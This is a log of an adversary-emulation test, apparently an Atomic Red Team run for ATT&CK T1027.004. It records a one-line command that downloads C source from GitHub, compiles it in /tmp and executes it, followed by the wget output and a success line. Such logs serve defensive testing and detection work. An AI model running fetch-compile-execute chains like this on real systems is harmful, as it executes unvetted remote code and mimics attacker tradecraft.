[+] Tactic ID   : T1027.004-1
[+] Technique   : Obfuscated Files or Information: Compile After Delivery - C compile
[+] Command     :
wget -O /tmp/T1027-004-test.c https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1027.004/src/T1027-004-test.c && gcc /tmp/T1027-004-test.c -o /tmp/test_c && /tmp/test_c
[+] Success
----- OUTPUT START -----
--2025-08-12 16:36:53--  https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1027.004/src/T1027-004-test.c
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 185.199.108.133, 185.199.109.133, 185.199.110.133, ...
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|185.199.108.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 101 [text/plain]
Saving to: ‘/tmp/T1027-004-test.c’

     0K                                                       100% 12.1M=0s

2025-08-12 16:36:53 (12.1 MB/s) - ‘/tmp/T1027-004-test.c’ saved [101/101]

T1027-004-test.c has compiled and executed
----- OUTPUT END -----
